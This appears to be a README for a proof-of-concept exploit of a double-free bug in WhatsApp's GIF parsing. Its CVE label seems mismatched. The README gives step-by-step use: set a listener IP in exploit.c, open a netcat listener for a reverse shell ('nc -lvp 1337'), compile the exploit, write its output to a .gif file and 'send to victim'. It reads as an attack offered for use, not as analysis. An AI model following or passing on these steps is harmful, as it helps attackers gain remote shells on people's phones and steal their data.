Awesome
CVE-2020-11932
Double-Free bug in WhatsApp exploit poc.
#Note: Make sure to set the listner ip in exploit.c inorder to get shell
-
nc -lvp 1337 or whatever port.
-
and then compile.
-
make
-
or
-
gcc -o exploit egif_lib.c exploit.c
-
then run ./exploit and save the content to <filename>.gif
-
and send to victim.
Source
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
Poc_Video
https://drive.google.com/file/d/1XP7K5zkKEhmbEONvRpjrkTQ5pwpBc6G_/view?usp=sharing
I don't own this , if you have issues please contact the owner